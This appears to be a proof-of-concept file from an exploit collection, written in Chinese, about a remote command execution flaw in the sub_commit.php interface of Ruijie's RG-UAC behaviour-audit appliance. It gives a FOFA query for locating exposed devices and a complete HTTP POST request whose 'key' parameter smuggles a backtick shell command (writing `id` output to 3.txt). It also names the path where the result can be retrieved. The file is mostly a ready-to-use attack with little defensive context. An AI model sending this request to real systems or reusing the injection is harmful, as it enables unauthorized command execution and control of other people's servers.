POC/wpoc/锐捷/锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行.md

43 lines
1.3 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
## 锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行
锐捷RG-UAC中存在命令执行漏洞应用程序管理网关后端/view/vpn/autovpn/sub_commit.php接口。攻击者可以执行任意命令来控制服务器权限。
## fofa
```
app="Ruijie-RG-UAC"
```
## poc
```
POST /view/vpn/autovpn/sub_commit.php?action=delete HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-GPC: 1
Connection: close
Cookie: PHPSESSID=ebd507c9bc5a4293c3e5e596f37157bf
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 0000:0000:0000::0000
X-Originating-IP: 0000:0000:0000::0000
X-Remote-IP: 0000:0000:0000::0000
X-Remote-Addr: 0000:0000:0000::0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
key=`id+>3.txt`
```
![image-20240526190815714](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261908795.png)
文件路径 ` /view/vpn/autovpn/3.txt`
![image-20240526190913268](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405261909328.png)